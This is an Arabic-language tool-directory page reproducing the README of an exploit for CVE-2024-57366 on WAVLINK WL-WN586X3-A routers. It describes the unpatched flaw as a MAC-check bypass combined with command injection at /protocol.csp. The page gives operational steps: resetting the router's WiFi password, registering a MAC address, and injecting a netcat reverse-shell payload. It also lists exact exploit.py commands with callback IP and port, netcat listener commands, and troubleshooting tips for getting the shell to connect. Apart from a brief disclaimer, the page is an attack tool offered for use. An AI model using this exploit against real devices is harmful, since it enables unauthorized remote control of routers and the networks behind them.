Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-57366 — استغلال مُنتَج للثغرة CVE-2024-57366 على أجهزة توجيه WAVLINK WL-WN586X3-A (غير مُصَحَّحة حتى هذا الإصدار!) | Kitploit
أدوات/GitHubGitHub/h4ckusaur/cve-2024-57366
أمان إنترنت الأشياءتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الشبكات اللاسلكيةاختبار الاختراقالقيادة والسيطرةالفريق الأحمرتطوير الحمولات
GitHubh4ckusaur/cve-2024-57366

CVE-2024-57366

استغلال مُنتَج للثغرة CVE-2024-57366 على أجهزة توجيه WAVLINK WL-WN586X3-A (غير مُصَحَّحة حتى هذا الإصدار!)

منذ 11 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع

استغلال CVE-2024-57366

أداة استغلال قوية لـ CVE-2024-57366 تتيح تنفيذ الأوامر عن بُعد على أجهزة التوجيه (الراوترات) الضعيفة من خلال تجاوز التحقق من عنوان MAC وحقن الأوامر.

هذا استغلال بعد التصديق (post-authorization) يتطلب تفعيل ميزة "التحكم عن بُعد" في الراوتر، بالإضافة إلى كلمة مرور الإدارة. اسم مستخدم الإدارة مُثبت بقيمة "admin".

🚀 الميزات

  • تسجيل عنوان MAC تلقائي - الاتصال بشبكة WiFi لتسجيل عنوان MAC مع الراوتر
  • استغلال يحافظ على الشبكة - الحفاظ على اتصالات الشبكة الحالية أثناء الاستغلال
  • تخزين مؤقت لعناوين MAC - استغلال سريع متكرر باستخدام عناوين MAC المخزنة الناجحة
  • متوافق مع BurpSuite - مطابقة تامة لصيغة الطلب لتحقيق أقصى موثوقية
  • معالجة المهلات الزمنية - رسائل مفيدة عند توقع اتصالات الصدفة العكسية (reverse shell)
  • سهل الاستخدام - تخزين مؤقت بسيط لعناوين MAC يعتمد على النص لسهولة الإدارة

📋 المتطلبات

  • Python 3.6+
  • نظام Linux مع محول لاسلكي
  • صلاحية sudo (مطلوبة لإدارة واجهة الشبكة)
  • راوتر الهدف معرض لثغرة CVE-2024-57366

🛠️ التثبيت

  1. استنساخ أو تحميل ملفات الاستغلال
  2. تأكد من توفر حزم Python المطلوبة:
    root@kitploit:~
    pip3 install requests
    

🎯 الاستخدام

الاستغلال الأساسي (المرة الأولى)

root@kitploit:~
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123

استغلال سريع (باستخدام MAC المخزن)

root@kitploit:~
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123
# سيسأل البرنامج النصي: "Use cached MAC for quick exploit? (y/n):" - قل "y"

فرض الاستغلال الكامل (تجاوز التخزين المؤقت)

root@kitploit:~
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123 --force-full

عرض عناوين MAC المخزنة

root@kitploit:~
python3 exploit.py --list-cached

📖 خيارات سطر الأوامر

  • --target - عنوان IP للراوتر الهدف (الافتراضي: 127.0.0.1)
  • --port - منفذ الراوتر الهدف (الافتراضي: 80)
  • --local-ip - عنوان IP المحلي الخاص بك لاستدعاء الصدفة العكسية
  • --local-port - المنفذ المحلي لاستدعاء الصدفة العكسية (الافتراضي: 4444)
  • --password - كلمة مرور إدارة الراوتر
  • --ssid - اسم شبكة WiFi (الافتراضي: WAVLINK-Mesh_DC4B)
  • --force-full - فرض الاستغلال الكامل، تخطي فحص MAC المخزن
  • --list-cached - عرض عناوين MAC المخزنة والخروج

🔧 كيف يعمل

نظرة عامة تقنية

يستغل CVE-2024-57366 تجاوز التحقق من عنوان MAC في برنامج الثابتة (firmware) للراوتر. تتيح الثغرة حقن الأوامر من خلال المعامل mac في نقطة النهاية /protocol.csp.

عملية الاستغلال

  1. المصادقة - استخراج رمز المصادقة من الراوتر
  2. إعادة تعيين كلمة مرور WiFi - إعادة تعيين كلمة مرور WiFi للراوتر لتطابق كلمة مرور الإدارة
  3. تسجيل MAC - الاتصال بشبكة WiFi لتسجيل عنوان MAC مع الراوتر
  4. حقن الأوامر - حقن حمولة الصدفة العكسية باستخدام MAC المسجل
  5. الحفاظ على الشبكة - الحفاظ على اتصالات الشبكة الحالية طوال العملية

تفاصيل تقنية رئيسية

  • تجاوز التحقق من MAC: يتحقق الراوتر من عناوين MAC بالتحقق مما إذا كانت قد اتصلت بشبكة WiFi
  • ربط واجهة الشبكة: يستخدم واجهة eth0 للحفاظ على سياق الشبكة الأصلي
  • صيغة الطلب: تطابق صيغة BurpSuite تمامًا (index=1، الرمز في مسار URL)
  • الحمولة: صدفة عكسية باستخدام Netcat مع named pipe لتحقيق الموثوقية

التخزين المؤقت لعناوين MAC

يقوم الاستغلال تلقائيًا بتخزين عناوين MAC الناجحة في الملف successful_macs.txt:

root@kitploit:~
# CVE-2024-57366 Successful MAC Addresses
# Format: MAC_ADDRESS TARGET_IP TIMESTAMP
# You can manually add entries here

32:98:A2:A8:5F:5F 192.168.1.187 1758305048.0 # 2025-09-19 14:44:08

إضافة MAC يدويًا: قم بتحرير successful_macs.txt وأضف سطورًا مثل:

root@kitploit:~
AA:BB:CC:DD:EE:FF 192.168.1.100 1758305048.0 # 2025-09-19 14:44:08

🎯 مثال على الاستخدام

محاولة الاستغلال الأولى

root@kitploit:~
# بدء مستمع netcat
nc -lvp 4444

# تشغيل الاستغلال
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123

# عند الطلب لحفظ عنوان MAC، قل "y"

الاستغلالات التالية (أسرع بكثير)

root@kitploit:~
# بدء مستمع netcat
nc -lvp 4444

# تشغيل الاستغلال (سيستخدم MAC المخزن)
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123
# قل "y" عند السؤال عن استخدام MAC المخزن

🔍 استكشاف الأخطاء وإصلاحها

المشكلات الشائعة

  1. "لم يتم العثور على محولات لاسلكية"

    • تأكد من تمكين محول لاسلكي
    • تحقق من تشغيل WiFi
    • جرب التشغيل باستخدام sudo
  2. "فشل التحقق من عنوان MAC"

    • يجب تسجيل عنوان MAC لدى الراوتر
    • تأكد من اكتمال خطوة الاتصال بـ WiFi بنجاح
    • جرب الاتصال بشبكة WiFi يدويًا أولاً
  3. "انتهت مهلة الطلب"

    • هذا قد يعني أن الاستغلال قد نجح!
    • تحقق من مستمع netcat لديك لوجود اتصال صدفة عكسية
    • قد يكون الراوتر ينفذ الأمر ولكن لا يستجيب لـ HTTP
  4. "الصدفة العكسية لا تتصل"

    • تحقق من صحة --local-ip (استخدم ip addr show eth0)
    • تأكد من عدم وجود جدار ناري يحظر الاتصال
    • تحقق من أن مستمع netcat يعمل على المنفذ الصحيح

متطلبات الشبكة

  • واجهة eth0: يجب أن يكون لها عنوان IP للحفاظ على الشبكة
  • المحول اللاسلكي: مطلوب لتسجيل MAC الأولي
  • الوصول إلى الراوتر: يجب أن تكون قادرًا على الوصول إلى الراوتر عبر واجهة eth0

📁 هيكل الملفات

root@kitploit:~
CVE-2024-57366/
├── exploit.py              # البرنامج النصي الرئيسي للاستغلال
├── successful_macs.txt     # ذاكرة التخزين المؤقت لعناوين MAC (يتم إنشاؤها تلقائيًا)
└── README.md              # هذا الملف

⚠️ إخلاء مسؤولية

هذه الأداة مخصصة للأغراض التعليمية والاختبار المصرح به فقط. استخدمها فقط على الأنظمة التي تملكها أو لديك إذن صريح لاختبارها. المؤلفون غير مسؤولين عن أي استخدام خاطئ لهذه الأداة.

🔗 المراجع

  • CVE-2024-57366
  • ثغرة في برنامج الثابتة للراوتر في التحقق من عنوان MAC
  • حقن الأوامر من خلال نقطة النهاية /protocol.csp

📝 الترخيص

يُقدم هذا المشروع كما هو للأغراض التعليمية. استخدمه بمسؤولية ووفقًا للقوانين واللوائح المعمول بها.

تنزيل الأداة